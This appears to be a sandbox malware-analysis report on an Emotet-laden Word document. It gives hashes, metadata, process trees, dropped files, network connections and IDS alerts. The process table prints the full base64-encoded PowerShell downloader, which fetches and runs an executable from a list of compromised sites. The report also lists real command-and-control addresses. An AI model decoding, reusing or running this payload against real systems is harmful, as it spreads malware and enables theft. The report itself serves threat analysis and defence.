File name: | 201020.doc |
Full analysis: | https://app.any.run/tasks/1bc55998-c026-468f-bbbf-56a654621d21 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 20, 2020, 01:48:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Quod., Author: Antoine Henry, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 20 01:15:00 2020, Last Saved Time/Date: Tue Oct 20 01:15:00 2020, Number of Pages: 1, Number of Words: 2064, Number of Characters: 11767, Security: 8 |
MD5: | B87861807E2C707CCE3B833FD442D8FD |
SHA1: | AE7E84022E8819DE88405ED7736FDEAED0431CC6 |
SHA256: | 19AAD5040FEE8A81772E4326AA715F5FDFA438971518F212A8A8A8F96BF9AE1F |
SSDEEP: | 3072:/JivKie6B/w2yiWydwzXk/7p16zy+S9Sd+l4PJhERTM5/oKUQ2t1zJ3ASY9h9l:/JiP/w2PaXu7p16zy+S9Sd+l4PJhERTU |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Quod. |
---|---|
Subject: | - |
Author: | Antoine Henry |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:10:20 00:15:00 |
ModifyDate: | 2020:10:20 00:15:00 |
Pages: | 1 |
Words: | 2064 |
Characters: | 11767 |
Security: | Locked for annotations |
Company: | - |
Lines: | 98 |
Paragraphs: | 27 |
CharCountWithSpaces: | 13804 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2364 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\201020.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2948 | POwersheLL -ENCOD IABTAGUAVAAtAHYAYQByAEkAQQBCAGwARQAgACAAKAAiAHMAYgAiACsAIgBBACIAKQAgACgAWwB0AHkAcABlAF0AKAAnAHMAWQBzAFQAJwArACcARQBtAC4AJwArACcASQBPACcAKwAnAC4AJwArACcAZABpAFIAJwArACcARQBjAFQAbwByAHkAJwApACkAIAA7ACAAIABTAEUAVAAtAFYAYQByAGkAYQBiAGwAZQAgAFEATgBFAG8AZAAgACgAWwB0AHkAUABFAF0AKAAnAFMAeQAnACsAJwBzAHQARQBNAC4AJwArACcATgBFAFQALgBzACcAKwAnAEUAcgBWAEkAYwAnACsAJwBlAHAATwBpAG4AJwArACcAdABtACcAKwAnAEEATgBBACcAKwAnAEcAJwArACcARQByACcAKQApACAAIAA7ACAAIAAgACAAUwB2ACAAKAAiADEAIgArACIANgBVAEUAWQAiACkAIAAoACAAIABbAHQAWQBQAEUAXQAoACcAUwB5ACcAKwAnAHMAdABFAG0AJwArACcALgBOACcAKwAnAGUAVAAuAHMARQBjAHUAUgBJAHQAJwArACcAeQBQAHIAbwAnACsAJwB0AE8AQwBPACcAKwAnAEwAdAB5AFAAZQAnACkAKQAgADsAJABEAHcAMgB2AG4AdwBkAD0AKAAnAEwAJwArACcAMwBqAGYAXwBvADIAJwApADsAJABFAHYAMwBpAHQAMQB0AD0AJABKAGsAbwAyAHMAZwBvACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQAWABoAHMAcgBmADAAdQA7ACQASgA3AGQAOABfADkAMwA9ACgAJwBCACcAKwAnAHQAdgA4AGcAYgAnACsAJwByACcAKQA7ACAAKAAgACAARwBlAHQALQB2AGEAUgBJAEEAYgBMAGUAIAAgACgAIgBzAEIAIgArACIAQQAiACkAIAAtAFYAQQBMAHUAZQBvAG4AKQA6ADoAYwBSAGUAYQBUAGUAZABpAHIAZQBjAHQATwByAHkAKAAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACAAKwAgACgAKAAnAEIAJwArACcAMAAnACsAJwA2AFYAZgBnAF8AeQBwAGgAQgAwACcAKwAnADYAVgB5ADQAXwBxAGUAaQBCADAAJwArACcANgAnACkAIAAgAC0AcgBlAFAAbABBAEMAZQAgACAAKABbAGMAaABhAHIAXQA2ADYAKwBbAGMAaABhAHIAXQA0ADgAKwBbAGMAaABhAHIAXQA1ADQAKQAsAFsAYwBoAGEAcgBdADkAMgApACkAOwAkAFkAegB4AGYAMQBzAHAAPQAoACcARgB6AHoAJwArACcAZgBlACcAKwAnAHcAcwAnACkAOwAgACgARwBlAHQALQB2AEEAUgBJAGEAQgBsAEUAIABRAG4AZQBvAGQAIAApAC4AdgBhAGwAdQBFADoAOgBzAEUAYwB1AFIAaQBUAFkAUAByAE8AVABPAEMAbwBsACAAPQAgACAAJAAxADYAdQBlAFkAOgA6AFQATABzADEAMgA7ACQARgBoADUAZABrADUAZgA9ACgAJwBOAGcAJwArACcAegAnACsAJwBfAHcAcwA2ACcAKQA7ACQATQBlAHkAbQBmADAAMAAgAD0AIAAoACcAVABiAHUAcQBtACcAKwAnAHAAbQA2AHIAJwApADsAJABSAGsAagB3AGQAcABhAD0AKAAnAFIAXwBpAG4AZgBkACcAKwAnAHUAJwApADsAJABRAHUANABxAG0AMgA1AD0AKAAnAEsAYwBjACcAKwAnAGIAZgA0ADcAJwApADsAJABWADcAcQBpADcAegBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHcAOABkAFYAJwArACcAZgBnAF8AeQAnACsAJwBwAGgAdwA4AGQAJwArACcAVgB5ADQAXwBxACcAKwAnAGUAJwArACcAaQAnACsAJwB3ADgAZAAnACkALgBSAGUAcABMAGEAQwBFACgAJwB3ADgAZAAnACwAWwBTAFQAUgBJAE4AZwBdAFsAQwBoAEEAcgBdADkAMgApACkAKwAkAE0AZQB5AG0AZgAwADAAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAFEAZgBmADYAZgA4AGQAPQAoACcAWQB0ADQANwB4AG4AJwArACcANwAnACkAOwAkAEYAcAA5AHgANwA3AG0APQBOAEUAVwBgAC0AYABPAGIASgBFAEMAVAAgAG4ARQBUAC4AdwBFAGIAYwBMAEkARQBOAHQAOwAkAFAAbAB6AGgAegBiADkAPQAoACcAaAB0AHQAcABzADoALwAvAHEAdQBhAG4AdAB1ACcAKwAnAG0AZQAnACsAJwBkAHUALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvACcAKwAnADIANAAzADYAaQAnACsAJwBUAG0ANABhAGMALwAqAGgAJwArACcAdAB0AHAAJwArACcAcwA6AC8ALwBmAGEAcwB0AG0AbwB0AG8AcgAuACcAKwAnADAAMAAwACcAKwAnAHcAZQBiAGgAbwBzAHQAYQAnACsAJwBwAHAALgBjAG8AJwArACcAbQAvAHcAcAAtAGEAZAAnACsAJwBtACcAKwAnAGkAbgAvACcAKwAnAE4AJwArACcAeABvAFYANABZAEkAVQAvACoAaAB0ACcAKwAnAHQAcAAnACsAJwBzADoALwAvAGUAYwBvAGwAZQBrAC4AZQBlAC8AdwBwAC0AYQBkACcAKwAnAG0AaQBuAC8ARQBWADAAJwArACcAUAAvACcAKwAnACoAaAB0ACcAKwAnAHQAcAA6AC8ALwB3AHcAdwAuAHAAbwAnACsAJwByAG4AJwArACcAbQAnACsAJwBhAG4ALgBjAG8AbQAvAGkAbQBnAC8AQwAvACoAaAB0AHQAJwArACcAcABzADoALwAnACsAJwAvAGUAeAAnACsAJwBhACcAKwAnAG0AcwAnACsAJwBpAG4AZgBvAC4AaQAnACsAJwBuAC8AJwArACcAdwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdABlAG4AdAAvAG8AJwArACcAaABVACcAKwAnADgAWgBEAEMAOAAnACsAJwBJAFgALwAqACcAKwAnAGgAdAB0AHAAOgAvAC8AZAAnACsAJwBlACcAKwAnAGEAbABzAG0AZQBkACcAKwAnAGkAYQAuAGkAbgAvACcAKwAnAHcAcAAtACcAKwAnAGMAbwAnACsAJwBuAHQAZQBuAHQALwBPAGIANwAzAHUASQAnACsAJwAvACoAaAB0AHQAJwArACcAcAA6AC8ALwBoAHAAdwAnACsAJwBkACcAKwAnAHkAJwArACcALgBjACcAKwAnAG8AbQAvACcAKwAnAGQAbwBjAHMALwBqAGMAZAB1AHQAJwArACcAagAnACsAJwBqAC8AJwApAC4AUwBQAGwASQBUACgAJABYAGUAMwAzAGIAYgA0ACAAKwAgACQARQB2ADMAaQB0ADEAdAAgACsAIAAkAE0AcQBoAGEAbgAwADAAKQA7ACQAQwBrADEAYQA5ADEAYwA9ACgAJwBMACcAKwAnAHUAcgAnACsAJwA1ADkAOQBoACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBvADMAbwAyADIAdwAgAGkAbgAgACQAUABsAHoAaAB6AGIAOQApAHsAdAByAHkAewAkAEYAcAA5AHgANwA3AG0ALgBEAE8AVwBOAEwAbwBBAGQAZgBJAGwAZQAoACQAUQBvADMAbwAyADIAdwAsACAAJABWADcAcQBpADcAegBnACkAOwAkAEUAdwBmAGIAYQBkADkAPQAoACcASgAnACsAJwBoACcAKwAnAG8AMQAxAGMAOAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBgAEkAYABUAGUATQAgACQAVgA3AHEAaQA3AHoAZwApAC4ATABlAE4ARwBUAEgAIAAtAGcAZQAgADMAOQA2ADcAOAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwArACcAaQBuADMAJwArACcAMgBfAFAAcgBvAGMAZQBzAHMAJwApACkALgBjAFIARQBhAHQARQAoACQAVgA3AHEAaQA3AHoAZwApADsAJABYADMAbgB4ADcAdABnAD0AKAAnAEIAbAAnACsAJwBzAHUAXwBhACcAKwAnAHQAJwApADsAYgByAGUAYQBrADsAJABEADYAMgA1ADkANwBhAD0AKAAnAEMAJwArACcAeAAyAG0AbQBhAG8AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAGoAYQBmADYAcABrAD0AKAAnAFkAJwArACcAXwAwADMAcAAnACsAJwBjAG4AJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2472 | C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe | C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
604 | "C:\Users\admin\AppData\Local\dot3msm\PortableDeviceClassExtension.exe" | C:\Users\admin\AppData\Local\dot3msm\PortableDeviceClassExtension.exe | Tbuqmpm6r.exe | |
User: admin Company: TODO: <Co Integrity Level: MEDIUM Description: TODO: <File descri Version: 1.0.0.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR40E6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2948 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QQ7VFDDAHKXBBI6EA7XP.temp | — | |
MD5:— | SHA256:— | |||
2948 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:ECA866BD00FA32C62A744B54BEB8042E | SHA256:130F37EB82B6DECFEEDA56B31333E0CB7E0D44B7C1B3E7AEF42BD7A37903F8B1 | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:C31099AECB9DBAB195441F703D4DCE3B | SHA256:4663B723D5F81FC39DEBA249FB3C0E5465495D517BC2937F82B0E6A6E82C19FA | |||
2948 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d4d98.TMP | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
2472 | Tbuqmpm6r.exe | C:\Users\admin\AppData\Local\dot3msm\PortableDeviceClassExtension.exe | executable | |
MD5:74418B9200D4A6D9D879069BC4581787 | SHA256:6E185FBC2A410C8A33D51EEE8C3F21124759D2DBCCCF8C2906F77B4C82323EBA | |||
2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$201020.doc | pgc | |
MD5:5988B879CA0E858390D6C7594DA90C9F | SHA256:B3BCF8079004E50782654539BDE740B349FD77B59B0DBB45E5F5E6E3F4AABBD0 | |||
2948 | POwersheLL.exe | C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe | executable | |
MD5:74418B9200D4A6D9D879069BC4581787 | SHA256:6E185FBC2A410C8A33D51EEE8C3F21124759D2DBCCCF8C2906F77B4C82323EBA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2948 | POwersheLL.exe | GET | 200 | 69.61.42.251:80 | http://www.pornman.com/img/C/ | US | executable | 505 Kb | suspicious |
604 | PortableDeviceClassExtension.exe | POST | — | 177.130.51.198:80 | http://177.130.51.198/veOrFYbeZGNbwy/cQ0HpLpJqen/igHO4CAEu/ | BR | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2948 | POwersheLL.exe | 69.61.42.251:80 | www.pornman.com | Cyber Wurx LLC | US | suspicious |
— | — | 104.31.69.54:443 | quantumedu.com | Cloudflare Inc | US | unknown |
2948 | POwersheLL.exe | 104.31.69.54:443 | quantumedu.com | Cloudflare Inc | US | unknown |
2948 | POwersheLL.exe | 145.14.145.135:443 | fastmotor.000webhostapp.com | Hostinger International Limited | US | shared |
2948 | POwersheLL.exe | 217.146.69.5:443 | ecolek.ee | Zone Media OU | EE | unknown |
604 | PortableDeviceClassExtension.exe | 177.130.51.198:80 | — | Wsp Serviços de Telecomunicações Ltda | BR | malicious |
Domain | IP | Reputation |
---|---|---|
quantumedu.com |
| unknown |
fastmotor.000webhostapp.com |
| shared |
dns.msftncsi.com |
| shared |
ecolek.ee |
| unknown |
www.pornman.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
2948 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2948 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2948 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |